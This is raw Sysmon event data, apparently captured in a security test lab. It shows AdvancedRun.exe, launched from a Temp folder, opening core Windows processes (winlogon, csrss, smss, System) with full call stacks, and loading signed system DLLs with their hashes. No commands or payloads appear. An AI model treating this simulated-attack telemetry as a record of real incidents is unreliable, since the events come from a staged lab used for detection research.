20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079704Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000004079703Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft 
WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:20.815{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.530{834264DD-DB11-61EA-9500-000000002702}4285200C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.523{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.521{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.512{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004079681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000004079678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.286{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:18.283{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.146{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.144{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft 
CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004079673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000004079672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 